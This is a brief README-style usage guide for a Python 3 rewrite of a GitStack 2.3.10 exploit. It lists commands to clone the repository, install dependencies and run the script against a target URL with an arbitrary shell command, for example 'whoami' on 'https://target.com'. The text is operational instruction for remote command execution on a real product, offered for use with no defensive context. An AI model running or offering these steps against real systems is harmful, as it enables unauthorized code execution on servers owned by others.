git clone https://github.com/aniko33/GitStackExploit_2.3.10 &&\
cd GitStackExploit_2.3.10 &&\
pip install -r requirements.txt &&\
chmod +x gitstack_2.3.10.py
./gitstack_2.3.10.py <HTTP://URL> <decoding: true, false> <EXEC>
Example: ./gitstack_2.3.10.py https://target.com true whoami
The exploit was written in Python 2, which is now an obsolete version, so I decided to rewrite it in Python 3, for the community and to make it easier to use